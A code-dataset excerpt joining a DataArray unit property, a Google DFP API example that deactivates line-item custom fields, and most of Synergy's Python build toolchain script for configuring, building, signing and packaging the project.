self._h5group.set_attr("label", l)
@property
def unit(self):
"""
The unit of the values stored in the DataArray. This is a read-write
property and can be set to None.
:type: str
"""
return self._h5group.get_attr("unit")
@unit.setter
def unit(self, u):
util.check_attr_type(u, str)
if u is not None:
u = util.units.sanitizer(u)
if not (util.units.is_si(u) or util.units.is_compound(u)):
raise InvalidUnit(
"{} is not SI or composite of SI units".format(u),
"DataArray.unit"
)
self._h5group.set_attr("unit", u)
| bsd-3-clause | 6,309,524,489,179,583,000 | 31.913386 | 79 | 0.605742 | false |
caioserra/apiAdwords | examples/adspygoogle/dfp/v201308/custom_field_service/deactivate_all_line_item_custom_fields.py | 2 | 2861 | #!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example deactivates all active line items custom fields.
To determine which custom fields exist, run get_all_custom_fields.py.
Tags: CustomFieldService.getCustomFieldsByStatement
Tags: CustomFieldService.performCustomFieldAction
"""
__author__ = '[email protected] (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
from adspygoogle.dfp import DfpUtils
def main(client):
# Initialize appropriate service.
custom_field_service = client.GetService(
'CustomFieldService', version='v201308')
# Create statement to select only active custom fields that apply to
# line items.
values = [
{
'key': 'entityType',
'value': {
'xsi_type': 'TextValue',
'value': 'LINE_ITEM'
}
}, {
'key': 'isActive',
'value': {
'xsi_type': 'BooleanValue',
'value': 'true'
}
}
]
query = 'WHERE entityType = :entityType and isActive = :isActive'
# Get custom fields by statement.
custom_fields = DfpUtils.GetAllEntitiesByStatementWithService(
custom_field_service, query=query, bind_vars=values)
# Display results.
for custom_field in custom_fields:
print ('Custom field with ID \'%s\' and name \'%s\' will be deactivated.'
% (custom_field['id'], custom_field['name']))
print
print 'Number of custom fields to be deactivated: %s' % len(custom_fields)
if custom_fields:
# Perform action.
result = custom_field_service.PerformCustomFieldAction(
{'type': 'DeactivateCustomFields'},
{'query': query, 'values': values})[0]
# Display results.
if result and int(result['numChanges']) > 0:
print 'Number of custom fields deactivated: %s' % result['numChanges']
else:
print 'No custom fields were deactivated.'
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client)
| apache-2.0 | -4,093,755,459,794,316,300 | 30.788889 | 80 | 0.664453 | false |
RobertoMalatesta/synergy | ext/toolchain/commands1.py | 22 | 55902 | # synergy -- mouse and keyboard sharing utility
# Copyright (C) 2012 Synergy Si Ltd.
# Copyright (C) 2009 Nick Bolton
#
# This package is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# found in the file LICENSE that should have accompanied this file.
#
# This package is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# TODO: split this file up, it's too long!
import sys, os, ConfigParser, shutil, re, ftputil, zipfile, glob, commands
from generators import VisualStudioGenerator, EclipseGenerator, XcodeGenerator, MakefilesGenerator
from getopt import gnu_getopt
if sys.version_info >= (2, 4):
import subprocess
class Toolchain:
# minimum required version.
# 2.6 needed for ZipFile.extractall.
# do not change to 2.7, as the build machines are still at 2.6
# and are a massive pain in the ass to upgrade.
requiredMajor = 2
requiredMinor = 6
# options used by all commands
globalOptions = 'v'
globalOptionsLong = ['no-prompts', 'verbose', 'skip-gui', 'skip-core']
# list of valid commands as keys. the values are optarg strings, but most
# are None for now (this is mainly for extensibility)
cmd_opt_dict = {
'about' : ['', []],
'setup' : ['g:', ['generator=']],
'configure' : ['g:dr', ['generator=', 'debug', 'release', 'mac-sdk=', 'mac-identity=']],
'build' : ['dr', ['debug', 'release']],
'clean' : ['dr', ['debug', 'release']],
'update' : ['', []],
'install' : ['', []],
'doxygen' : ['', []],
'dist' : ['', ['vcredist-dir=', 'qt-dir=']],
'distftp' : ['', ['host=', 'user=', 'pass=', 'dir=']],
'kill' : ['', []],
'usage' : ['', []],
'revision' : ['', []],
'reformat' : ['', []],
'open' : ['', []],
'genlist' : ['', []],
'reset' : ['', []],
'signwin' : ['', ['pfx=', 'pwd=', 'dist']],
'signmac' : ['', []]
}
# aliases to valid commands
cmd_alias_dict = {
'info' : 'about',
'help' : 'usage',
'package' : 'dist',
'docs' : 'doxygen',
'make' : 'build',
'cmake' : 'configure',
}
def complete_command(self, arg):
completions = []
for cmd, optarg in self.cmd_opt_dict.iteritems():
# if command was matched fully, return only this, so that
# if `dist` is typed, it will return only `dist` and not
# `dist` and `distftp` for example.
if cmd == arg:
return [cmd,]
if cmd.startswith(arg):
completions.append(cmd)
for alias, cmd in self.cmd_alias_dict.iteritems():
# don't know if this will work just like above, but it's
# probably worth adding.
if alias == arg:
return [alias,]
if alias.startswith(arg):
completions.append(alias)
return completions
def start_cmd(self, argv):
cmd_arg = ''
if len(argv) > 1:
cmd_arg = argv[1]
# change common help args to help command
if cmd_arg in ('--help', '-h', '--usage', '-u', '/?'):
cmd_arg = 'usage'
completions = self.complete_command(cmd_arg)
if cmd_arg and len(completions) > 0:
if len(completions) == 1:
# get the only completion (since in this case we have 1)
cmd = completions[0]
# build up the first part of the map (for illustrative purposes)
cmd_map = list()
if cmd_arg != cmd:
cmd_map.append(cmd_arg)
cmd_map.append(cmd)
# map an alias to the command, and build up the map
if cmd in self.cmd_alias_dict.keys():
alias = cmd
if cmd_arg == cmd:
cmd_map.append(alias)
cmd = self.cmd_alias_dict[cmd]
cmd_map.append(cmd)
# show command map to avoid confusion
if len(cmd_map) != 0:
print 'Mapping command: %s' % ' -> '.join(cmd_map)
self.run_cmd(cmd, argv[2:])
return 0
else:
print (
'Command `%s` too ambiguous, '
'could mean any of: %s'
) % (cmd_arg, ', '.join(completions))
else:
if len(argv) == 1:
print 'No command specified, showing usage.\n'
else:
print 'Command not recognised: %s\n' % cmd_arg
self.run_cmd('usage')
# generic error code if not returned sooner
return 1
def run_cmd(self, cmd, argv = []):
verbose = False
try:
options_pair = self.cmd_opt_dict[cmd]
options = self.globalOptions + options_pair[0]
options_long = []
options_long.extend(self.globalOptionsLong)
options_long.extend(options_pair[1])
opts, args = gnu_getopt(argv, options, options_long)
for o, a in opts:
if o in ('-v', '--verbose'):
verbose = True
# pass args and optarg data to command handler, which figures out
# how to handle the arguments
handler = CommandHandler(argv, opts, args, verbose)
# use reflection to get the function pointer
cmd_func = getattr(handler, cmd)
cmd_func()
except:
if not verbose:
# print friendly error for users
sys.stderr.write('Error: ' + sys.exc_info()[1].__str__() + '\n')
sys.exit(1)
else:
# if user wants to be verbose let python do it's thing
raise
def run(self, argv):
if sys.version_info < (self.requiredMajor, self.requiredMinor):
print ('Python version must be at least ' +
str(self.requiredMajor) + '.' + str(self.requiredMinor) + ', but is ' +
str(sys.version_info[0]) + '.' + str(sys.version_info[1]))
sys.exit(1)
try:
self.start_cmd(argv)
except KeyboardInterrupt:
print '\n\nUser aborted, exiting.'
class InternalCommands:
project = 'synergy'
setup_version = 5 # increment to force setup/config
website_url = 'http://synergy-project.org/'
this_cmd = 'hm'
cmake_cmd = 'cmake'
qmake_cmd = 'qmake'
make_cmd = 'make'
xcodebuild_cmd = 'xcodebuild'
w32_make_cmd = 'mingw32-make'
w32_qt_version = '4.6.2'
defaultTarget = 'release'
cmake_dir = 'res'
gui_dir = 'src/gui'
doc_dir = 'doc'
extDir = 'ext'
sln_filename = '%s.sln' % project
xcodeproj_filename = '%s.xcodeproj' % project
configDir = 'build'
configFilename = '%s/%s.cfg' % (configDir, this_cmd)
qtpro_filename = 'gui.pro'
doxygen_filename = 'doxygen.cfg'
cmake_url = 'http://www.cmake.org/cmake/resources/software.html'
# try_chdir(...) and restore_chdir() will use this
prevdir = ''
# by default, no index specified as arg
generator_id = None
# by default, prompt user for input
no_prompts = False
# by default, compile the core
enableMakeCore = True
# by default, compile the gui
enableMakeGui = True
# by default, unknown
macSdk = None
# by default, unknown
macIdentity = None
# gtest dir with version number
gtestDir = 'gtest-1.6.0'
# gmock dir with version number
gmockDir = 'gmock-1.6.0'
win32_generators = {
1 : VisualStudioGenerator('10'),
2 : VisualStudioGenerator('10 Win64'),
3 : VisualStudioGenerator('9 2008'),
4 : VisualStudioGenerator('9 2008 Win64'),
5 : VisualStudioGenerator('8 2005'),
6 : VisualStudioGenerator('8 2005 Win64')
}
unix_generators = {
1 : MakefilesGenerator(),
2 : EclipseGenerator(),
}
darwin_generators = {
1 : MakefilesGenerator(),
2 : XcodeGenerator(),
3 : EclipseGenerator(),
}
def getBuildDir(self, target=''):
return self.getGenerator().getBuildDir(target)
def getBinDir(self, target=''):
return self.getGenerator().getBinDir(target)
def sln_filepath(self):
return '%s\%s' % (self.getBuildDir(), self.sln_filename)
def xcodeproj_filepath(self, target=''):
return '%s/%s' % (self.getBuildDir(target), self.xcodeproj_filename)
def usage(self):
app = sys.argv[0]
print ('Usage: %s <command> [-g <index>|-v|--no-prompts|<command-options>]\n'
'\n'
'Replace [command] with one of:\n'
' about Show information about this script\n'
' setup Runs the initial setup for this script\n'
' conf Runs cmake (generates project files)\n'
' open Attempts to open the generated project file\n'
' build Builds using the platform build chain\n'
' clean Cleans using the platform build chain\n'
' kill Kills all synergy processes (run as admin)\n'
' update Updates the source code from repository\n'
' revision Display the current source code revision\n'
' package Create a distribution package (e.g. tar.gz)\n'
' install Installs the program\n'
' doxygen Builds doxygen documentation\n'
' reformat Reformat .cpp and .h files using AStyle\n'
' genlist Shows the list of available platform generators\n'
' usage Shows the help screen\n'
'\n'
'Example: %s build -g 3'
) % (app, app)
def configureAll(self, targets, extraArgs=''):
# if no mode specified, use default
if len(targets) == 0:
targets += [self.defaultTarget,]
for target in targets:
self.configure(target)
def checkGTest(self):
dir = self.extDir + '/' + self.gtestDir
if (os.path.isdir(dir)):
return
zipFilename = dir + '.zip'
if (not os.path.exists(zipFilename)):
raise Exception('GTest zip not found at: ' + zipFilename)
if not os.path.exists(dir):
os.mkdir(dir)
zip = zipfile.ZipFile(zipFilename)
self.zipExtractAll(zip, dir)
def checkGMock(self):
dir = self.extDir + '/' + self.gmockDir
if (os.path.isdir(dir)):
return
zipFilename = dir + '.zip'
if (not os.path.exists(zipFilename)):
raise Exception('GMock zip not found at: ' + zipFilename)
if not os.path.exists(dir):
os.mkdir(dir)
zip = zipfile.ZipFile(zipFilename)
self.zipExtractAll(zip, dir)
# ZipFile.extractall() is buggy in 2.6.1
# http://bugs.python.org/issue4710
def zipExtractAll(self, z, dir):
if not dir.endswith("/"):
dir += "/"
for f in z.namelist():
if f.endswith("/"):
os.makedirs(dir + f)
else:
z.extract(f, dir)
def configure(self, target='', extraArgs=''):
# ensure latest setup and do not ask config for generator (only fall
# back to prompt if not specified as arg)
self.ensure_setup_latest()
if sys.platform == "darwin":
config = self.getConfig()
if self.macSdk:
config.set('hm', 'macSdk', self.macSdk)
elif config.has_option("hm", "macSdk"):
self.macSdk = config.get('hm', 'macSdk')
if self.macIdentity:
config.set('hm', 'macIdentity', self.macIdentity)
elif config.has_option("hm", "macIdentity"):
self.macIdentity = config.get('hm', 'macIdentity')
self.write_config(config)
if not self.macSdk:
raise Exception("Arg missing: --mac-sdk <version>");
if not self.macIdentity:
raise Exception("Arg missing: --mac-identity <name>");
sdkDir = self.getMacSdkDir()
if not os.path.exists(sdkDir):
raise Exception("Mac SDK not found at: " + sdkDir)
os.environ["MACOSX_DEPLOYMENT_TARGET"] = self.macSdk
# default is release
if target == '':
print 'Defaulting target to: ' + self.defaultTarget
target = self.defaultTarget
# allow user to skip core compile
if self.enableMakeCore:
self.configureCore(target, extraArgs)
# allow user to skip gui compile
if self.enableMakeGui:
self.configureGui(target, extraArgs)
self.setConfRun(target)
def configureCore(self, target="", extraArgs=""):
# ensure that we have access to cmake
_cmake_cmd = self.persist_cmake()
# now that we know we've got the latest setup, we can ask the config
# file for the generator (but again, we only fall back to this if not
# specified as arg).
generator = self.getGenerator()
if generator != self.findGeneratorFromConfig():
print('Generator changed, running setup.')
self.setup(target)
cmake_args = ''
if generator.cmakeName != '':
cmake_args += ' -G "' + generator.cmakeName + '"'
# for makefiles always specify a build type (debug, release, etc)
if generator.cmakeName.find('Unix Makefiles') != -1:
cmake_args += ' -DCMAKE_BUILD_TYPE=' + target.capitalize()
elif sys.platform == "darwin":
macSdkMatch = re.match("(\d+)\.(\d+)", self.macSdk)
if not macSdkMatch:
raise Exception("unknown osx version: " + self.macSdk)
sdkDir = self.getMacSdkDir()
cmake_args += " -DCMAKE_OSX_SYSROOT=" + sdkDir
cmake_args += " -DCMAKE_OSX_DEPLOYMENT_TARGET=" + self.macSdk
cmake_args += " -DOSX_TARGET_MAJOR=" + macSdkMatch.group(1)
cmake_args += " -DOSX_TARGET_MINOR=" + macSdkMatch.group(2)
# if not visual studio, use parent dir
sourceDir = generator.getSourceDir()
self.checkGTest()
self.checkGMock()
if extraArgs != '':
cmake_args += ' ' + extraArgs
cmake_cmd_string = _cmake_cmd + cmake_args + ' ' + sourceDir
# Run from build dir so we have an out-of-source build.
self.try_chdir(self.getBuildDir(target))
print "CMake command: " + cmake_cmd_string
err = os.system(cmake_cmd_string)
self.restore_chdir()
if generator.cmakeName.find('Eclipse') != -1:
self.fixCmakeEclipseBug()
if err != 0:
raise Exception('CMake encountered error: ' + str(err))
def configureGui(self, target="", extraArgs=""):
# make sure we have qmake
self.persist_qmake()
qmake_cmd_string = self.qmake_cmd + " " + self.qtpro_filename + " -r"
if sys.platform == "darwin":
# create makefiles on mac (not xcode).
qmake_cmd_string += " -spec macx-g++"
(major, minor) = self.getMacVersion()
if major == 10 and minor <= 4:
# 10.4: universal (intel and power pc)
qmake_cmd_string += ' CONFIG+="ppc i386"'
libs = (
"-framework ApplicationServices "
"-framework Security "
"-framework cocoa")
if major == 10 and minor >= 6:
libs += " -framework ServiceManagement"
qmake_cmd_string += " \"MACX_LIBS=%s\" " % libs
sdkDir = self.getMacSdkDir()
shortForm = "macosx" + self.macSdk
version = str(major) + "." + str(minor)
qmake_cmd_string += " QMAKE_MACOSX_DEPLOYMENT_TARGET=" + version
(qMajor, qMinor, qRev) = self.getQmakeVersion()
if qMajor <= 4:
# 4.6: qmake takes full sdk dir.
qmake_cmd_string += " QMAKE_MAC_SDK=" + sdkDir
else:
# 5.2: now we need to use the .path setting.
qmake_cmd_string += " QMAKE_MAC_SDK=" + shortForm
qmake_cmd_string += " QMAKE_MAC_SDK." + shortForm + ".path=" + sdkDir
print "QMake command: " + qmake_cmd_string
# run qmake from the gui dir
self.try_chdir(self.gui_dir)
err = os.system(qmake_cmd_string)
self.restore_chdir()
if err != 0:
raise Exception('QMake encountered error: ' + str(err))
def getQmakeVersion(self):
version = commands.getoutput("qmake --version")
result = re.search('(\d+)\.(\d+)\.(\d)', version)
if not result:
raise Exception("Could not get qmake version.")
major = int(result.group(1))
minor = int(result.group(2))
rev = int(result.group(3))
return (major, minor, rev)
def getMacSdkDir(self):
sdkName = "macosx" + self.macSdk
# Ideally we'll use xcrun (which is influenced by $DEVELOPER_DIR), then try a couple
# fallbacks to known paths if xcrun is not available
status, sdkPath = commands.getstatusoutput("xcrun --show-sdk-path --sdk " + sdkName)
if status == 0 and sdkPath:
return sdkPath
developerDir = os.getenv("DEVELOPER_DIR")
if not developerDir:
developerDir = "/Applications/Xcode.app/Contents/Developer"
sdkDirName = sdkName.replace("macosx", "MacOSX")
sdkPath = developerDir + "/Platforms/MacOSX.platform/Developer/SDKs/" + sdkDirName + ".sdk"
if os.path.exists(sdkPath):
return sdkPath
return "/Developer/SDKs/" + sdkDirName + ".sdk"
# http://tinyurl.com/cs2rxxb
def fixCmakeEclipseBug(self):
print "Fixing CMake Eclipse bugs..."
file = open('.project', 'r+')
content = file.read()
pattern = re.compile('\s+<linkedResources>.+</linkedResources>', re.S)
content = pattern.sub('', content)
file.seek(0)
file.write(content)
file.truncate()
file.close()
def persist_cmake(self):
# even though we're running `cmake --version`, we're only doing this for the 0 return
# code; we don't care about the version, since CMakeLists worrys about this for us.
err = os.system('%s --version' % self.cmake_cmd)
if err != 0:
# if return code from cmake is not 0, then either something has
# gone terribly wrong with --version, or it genuinely doesn't exist.
print ('Could not find `%s` in system path.\n'
'Download the latest version from:\n %s') % (
self.cmake_cmd, self.cmake_url)
raise Exception('Cannot continue without CMake.')
else:
return self.cmake_cmd
def persist_qt(self):
self.persist_qmake()
def persist_qmake(self):
# cannot use subprocess on < python 2.4
if sys.version_info < (2, 4):
return
try:
p = subprocess.Popen(
[self.qmake_cmd, '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except:
print >> sys.stderr, 'Error: Could not find qmake.'
if sys.platform == 'win32': # windows devs usually need hints ;)
print (
'Suggestions:\n'
'1. Ensure that qmake.exe exists in your system path.\n'
'2. Try to download Qt (check our dev FAQ for links):\n'
' qt-sdk-win-opensource-2010.02.exe')
raise Exception('Cannot continue without qmake.')
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not test for cmake: %s' % stderr)
else:
m = re.search('.*Using Qt version (\d+\.\d+\.\d+).*', stdout)
if m:
if sys.platform == 'win32':
ver = m.group(1)
if ver != self.w32_qt_version: # TODO: test properly
print >> sys.stderr, (
'Warning: Not using supported Qt version %s'
' (your version is %s).'
) % (self.w32_qt_version, ver)
else:
pass # any version should be ok for other platforms
else:
raise Exception('Could not find qmake version.')
def ensureConfHasRun(self, target, skipConfig):
if self.hasConfRun(target):
print 'Skipping config for target: ' + target
skipConfig = True
if not skipConfig:
self.configure(target)
def build(self, targets=[], skipConfig=False):
# if no mode specified, use default
if len(targets) == 0:
targets += [self.defaultTarget,]
self.ensure_setup_latest()
self.loadConfig()
# allow user to skip core compile
if self.enableMakeCore:
self.makeCore(targets)
# allow user to skip gui compile
if self.enableMakeGui:
self.makeGui(targets)
def loadConfig(self):
config = self.getConfig()
if config.has_option("hm", "macSdk"):
self.macSdk = config.get("hm", "macSdk")
if config.has_option("hm", "macIdentity"):
self.macIdentity = config.get("hm", "macIdentity")
def makeCore(self, targets):
generator = self.getGeneratorFromConfig().cmakeName
if self.macSdk:
os.environ["MACOSX_DEPLOYMENT_TARGET"] = self.macSdk
if generator.find('Unix Makefiles') != -1:
for target in targets:
self.runBuildCommand(self.make_cmd, target)
else:
for target in targets:
if generator.startswith('Visual Studio'):
self.run_vcbuild(generator, target, self.sln_filepath())
elif generator == 'Xcode':
cmd = self.xcodebuild_cmd + ' -configuration ' + target.capitalize()
self.runBuildCommand(cmd, target)
else:
raise Exception('Build command not supported with generator: ' + generator)
def makeGui(self, targets, args=""):
for target in targets:
if sys.platform == 'win32':
gui_make_cmd = self.w32_make_cmd + ' ' + target + args
print 'Make GUI command: ' + gui_make_cmd
self.try_chdir(self.gui_dir)
err = os.system(gui_make_cmd)
self.restore_chdir()
if err != 0:
raise Exception(gui_make_cmd + ' failed with error: ' + str(err))
elif sys.platform in ['linux2', 'sunos5', 'freebsd7', 'darwin']:
gui_make_cmd = self.make_cmd + " -w" + args
print 'Make GUI command: ' + gui_make_cmd
# start with a clean app bundle
targetDir = self.getGenerator().getBinDir(target)
bundleTargetDir = targetDir + '/Synergy.app'
if os.path.exists(bundleTargetDir):
shutil.rmtree(bundleTargetDir)
binDir = self.getGenerator().binDir
bundleTempDir = binDir + '/Synergy.app'
if os.path.exists(bundleTempDir):
shutil.rmtree(bundleTempDir)
self.try_chdir(self.gui_dir)
err = os.system(gui_make_cmd)
self.restore_chdir()
if err != 0:
raise Exception(gui_make_cmd + ' failed with error: ' + str(err))
if sys.platform == 'darwin' and not "clean" in args:
self.macPostGuiMake(target)
self.fixQtFrameworksLayout(target)
else:
raise Exception('Unsupported platform: ' + sys.platform)
def macPostGuiMake(self, target):
bundle = 'Synergy.app'
binDir = self.getGenerator().binDir
targetDir = self.getGenerator().getBinDir(target)
bundleTempDir = binDir + '/' + bundle
bundleTargetDir = targetDir + '/' + bundle
if os.path.exists(bundleTempDir):
shutil.move(bundleTempDir, bundleTargetDir)
if self.enableMakeCore:
# copy core binaries into the bundle, since the gui
# now looks for the binaries in the current app dir.
bundleBinDir = bundleTargetDir + "/Contents/MacOS/"
shutil.copy(targetDir + "/synergyc", bundleBinDir)
shutil.copy(targetDir + "/synergys", bundleBinDir)
shutil.copy(targetDir + "/syntool", bundleBinDir)
# Copy all generated plugins to the package
bundlePluginDir = bundleBinDir + "plugins"
pluginDir = targetDir + "/plugins"
print "Copying plugins dirtree: " + pluginDir
if os.path.isdir(pluginDir):
print "Copying to: " + bundlePluginDir
shutil.copytree(pluginDir, bundlePluginDir)
else:
print "pluginDir doesn't exist, skipping"
self.loadConfig()
if not self.macIdentity:
raise Exception("run config with --mac-identity")
if self.enableMakeGui:
# use qt to copy libs to bundle so no dependencies are needed. do not create a
# dmg at this point, since we need to sign it first, and then create our own
# after signing (so that qt does not affect the signed app bundle).
bin = "macdeployqt Synergy.app -verbose=2"
self.try_chdir(targetDir)
err = os.system(bin)
self.restore_chdir()
print bundleTargetDir
if err != 0:
raise Exception(bin + " failed with error: " + str(err))
(qMajor, qMinor, qRev) = self.getQmakeVersion()
if qMajor <= 4:
frameworkRootDir = "/Library/Frameworks"
else:
# TODO: auto-detect, qt can now be installed anywhere.
frameworkRootDir = "/Developer/Qt5.2.1/5.2.1/clang_64/lib"
target = bundleTargetDir + "/Contents/Frameworks"
# copy the missing Info.plist files for the frameworks.
for root, dirs, files in os.walk(target):
for dir in dirs:
if dir.startswith("Qt"):
shutil.copy(
frameworkRootDir + "/" + dir + "/Contents/Info.plist",
target + "/" + dir + "/Resources/")
def symlink(self, source, target):
if not os.path.exists(target):
os.symlink(source, target)
def move(self, source, target):
if os.path.exists(source):
shutil.move(source, target)
def fixQtFrameworksLayout(self, target):
# reorganize Qt frameworks layout on Mac 10.9.5 or later
# http://goo.gl/BFnQ8l
# QtCore example:
# QtCore.framework/
# QtCore -> Versions/Current/QtCore
# Resources -> Versions/Current/Resources
# Versions/
# Current -> 5
# 5/
# QtCore
# Resources/
# Info.plist
targetDir = self.getGenerator().getBinDir(target)
target = targetDir + "/Synergy.app/Contents/Frameworks"
(major, minor) = self.getMacVersion()
if major == 10:
if minor >= 9:
for root, dirs, files in os.walk(target):
for dir in dirs:
if dir.startswith("Qt"):
self.try_chdir(target + "/" + dir +"/Versions")
self.symlink("5", "Current")
self.move("../Resources", "5")
self.restore_chdir()
self.try_chdir(target + "/" + dir)
dot = dir.find('.')
frameworkName = dir[:dot]
self.symlink("Versions/Current/" + frameworkName, frameworkName)
self.symlink("Versions/Current/Resources", "Resources")
self.restore_chdir()
def signmac(self):
self.loadConfig()
if not self.macIdentity:
raise Exception("run config with --mac-identity")
self.try_chdir("bin/Release/")
err = os.system(
'codesign --deep -fs "' + self.macIdentity + '" Synergy.app')
self.restore_chdir()
if err != 0:
raise Exception("codesign failed with error: " + str(err))
def signwin(self, pfx, pwdFile, dist):
generator = self.getGeneratorFromConfig().cmakeName
if not generator.startswith('Visual Studio'):
raise Exception('only windows is supported')
f = open(pwdFile)
lines = f.readlines()
f.close()
pwd = lines[0]
if (dist):
self.signFile(pfx, pwd, 'bin/Release', self.getDistFilename('win'))
else:
self.signFile(pfx, pwd, 'bin/Release', 'synergy.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synergyc.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synergys.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synergyd.exe')
self.signFile(pfx, pwd, 'bin/Release', 'syntool.exe')
self.signFile(pfx, pwd, 'bin/Release', 'synwinhk.dll')
def signFile(self, pfx, pwd, dir, file):
self.try_chdir(dir)
err = os.system(
'signtool sign'
' /f ' + pfx +
' /p ' + pwd +
' /t http://timestamp.verisign.com/scripts/timstamp.dll ' +
file)
self.restore_chdir()
if err != 0:
raise Exception("signtool failed with error: " + str(err))
def runBuildCommand(self, cmd, target):
self.try_chdir(self.getBuildDir(target))
err = os.system(cmd)
self.restore_chdir()
if err != 0:
raise Exception(cmd + ' failed: ' + str(err))
def clean(self, targets=[]):
# if no mode specified, use default
if len(targets) == 0:
targets += [self.defaultTarget,]
# allow user to skip core clean
if self.enableMakeCore:
self.cleanCore(targets)
# allow user to skip qui clean
if self.enableMakeGui:
self.cleanGui(targets)
def cleanCore(self, targets):
generator = self.getGeneratorFromConfig().cmakeName
if generator.startswith('Visual Studio'):
# special case for version 10, use new /target:clean
if generator.startswith('Visual Studio 10'):
for target in targets:
self.run_vcbuild(generator, target, self.sln_filepath(), '/target:clean')
# any other version of visual studio, use /clean
elif generator.startswith('Visual Studio'):
for target in targets:
self.run_vcbuild(generator, target, self.sln_filepath(), '/clean')
else:
cmd = ''
if generator == "Unix Makefiles":
print 'Cleaning with GNU Make...'
cmd = self.make_cmd
elif generator == 'Xcode':
print 'Cleaning with Xcode...'
cmd = self.xcodebuild_cmd
else:
raise Exception('Not supported with generator: ' + generator)
for target in targets:
self.try_chdir(self.getBuildDir(target))
err = os.system(cmd + ' clean')
self.restore_chdir()
if err != 0:
raise Exception('Clean failed: ' + str(err))
def cleanGui(self, targets):
self.makeGui(targets, " clean")
def open(self):
generator = self.getGeneratorFromConfig().cmakeName
if generator.startswith('Visual Studio'):
print 'Opening with %s...' % generator
self.open_internal(self.sln_filepath())
elif generator.startswith('Xcode'):
print 'Opening with %s...' % generator
self.open_internal(self.xcodeproj_filepath(), 'open')
else:
raise Exception('Not supported with generator: ' + generator)
def update(self):
print "Running Subversion update..."
err = os.system('svn update')
if err != 0:
raise Exception('Could not update from repository with error code code: ' + str(err))
def revision(self):
print self.find_revision()
def find_revision(self):
return self.getGitRevision()
def getGitRevision(self):
if sys.version_info < (2, 4):
raise Exception("Python 2.4 or greater required.")
p = subprocess.Popen(
["git", "log", "--pretty=format:%h", "-n", "1"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not get revision, git error: ' + str(p.returncode))
return stdout.strip()
def getGitBranchName(self):
if sys.version_info < (2, 4):
raise Exception("Python 2.4 or greater required.")
p = subprocess.Popen(
["git", "rev-parse", "--abbrev-ref", "HEAD"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not get branch name, git error: ' + str(p.returncode))
result = stdout.strip()
# sometimes, git will prepend "heads/" infront of the branch name,
# remove this as it's not useful to us and causes ftp issues.
result = re.sub("heads/", "", result)
return result
def find_revision_svn(self):
if sys.version_info < (2, 4):
stdout = commands.getoutput('svn info')
else:
p = subprocess.Popen(['svn', 'info'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
raise Exception('Could not get revision - svn info failed with code: ' + str(p.returncode))
m = re.search('.*Revision: (\d+).*', stdout)
if not m:
raise Exception('Could not find revision number in svn info output.')
return m.group(1)
def kill(self):
if sys.platform == 'win32':
return os.system('taskkill /F /FI "IMAGENAME eq synergy*"')
else:
raise Exception('Not implemented for platform: ' + sys.platform)
def doxygen(self):
self.enableMakeGui = False
# The conf generates doc/doxygen.cfg from cmake/doxygen.cfg.in
self.configure(self.defaultTarget, '-DCONF_DOXYGEN:BOOL=TRUE')
err = os.system('doxygen %s/%s' % (self.doc_dir, self.doxygen_filename))
if err != 0:
raise Exception('doxygen failed with error code: ' + str(err))
def dist(self, type, vcRedistDir, qtDir):
# Package is supported by default.
package_unsupported = False
unixTarget = self.defaultTarget
if type == '' or type == None:
self.dist_usage()
return
moveExt = ''
if type == 'src':
self.distSrc()
elif type == 'rpm':
if sys.platform == 'linux2':
self.distRpm()
else:
package_unsupported = True
elif type == 'deb':
if sys.platform == 'linux2':
self.distDeb()
else:
package_unsupported = True
elif type == 'win':
if sys.platform == 'win32':
#self.distNsis(vcRedistDir, qtDir)
self.distWix()
else:
package_unsupported = True
elif type == 'mac':
if sys.platform == 'darwin':
self.distMac()
else:
package_unsupported = True
else:
raise Exception('Package type not supported: ' + type)
if moveExt != '':
self.unixMove(
self.getGenerator().buildDir + '/release/*.' + moveExt,
self.getGenerator().binDir)
if package_unsupported:
raise Exception(
("Package type, '%s' is not supported for platform, '%s'")
% (type, sys.platform))
def distRpm(self):
rpmDir = self.getGenerator().buildDir + '/rpm'
if os.path.exists(rpmDir):
shutil.rmtree(rpmDir)
os.makedirs(rpmDir)
templateFile = open(self.cmake_dir + '/synergy.spec.in')
template = templateFile.read()
template = template.replace('${in:version}', self.getVersionNumber())
specPath = rpmDir + '/synergy.spec'
specFile = open(specPath, 'w')
specFile.write(template)
specFile.close()
target = '../../bin/synergy-%s-%s.rpm' % (
self.getVersionForFilename(), self.getLinuxPlatform())
try:
self.try_chdir(rpmDir)
cmd = 'rpmbuild -bb --define "_topdir `pwd`" synergy.spec'
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('rpmbuild failed: ' + str(err))
self.unixMove('RPMS/*/*.rpm', target)
cmd = 'rpmlint ' + target
print "Command: " + cmd
err = os.system(cmd)
if err != 0:
raise Exception('rpmlint failed: ' + str(err))
finally:
self.restore_chdir()
def distDeb(self):
buildDir = self.getGenerator().buildDir
